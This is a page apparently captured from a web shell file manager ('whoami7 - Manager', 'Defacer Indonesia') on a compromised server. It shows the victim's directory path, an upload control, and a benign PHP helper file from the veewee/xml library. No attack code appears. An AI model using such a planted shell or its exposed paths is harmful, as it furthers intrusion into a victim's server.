whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
veewee
/
xml
/
src
/
Xml
/
Internal
/
Upload File:
files >> /home/kckglobal/www/portal/vendor/veewee/xml/src/Xml/Internal/configure.php
<?php declare(strict_types=1); namespace VeeWee\Xml\Internal; use Closure; use Psl\Iter; /** * @psalm-internal \Veewee\Xml * * Performs left-to-right function composition. * A copy os Psl\Fun\Pipe that expects the type to be the same during all pipes. * (The current psalm pipe plugin doesn't work well with generic closures) * @see https://github.com/vimeo/psalm/issues/7244 * * @template T * * @param callable(T): T ...$stages * * @return Closure(T): T * * @pure */ function configure(callable ...$stages): Closure { return static fn ($input) => Iter\reduce( $stages, /** * @param T $input * @param (callable(T): T) $next * * @return T */ static fn (mixed $input, callable $next): mixed => $next($input), $input ); }
Copyright ©2021 || Defacer Indonesia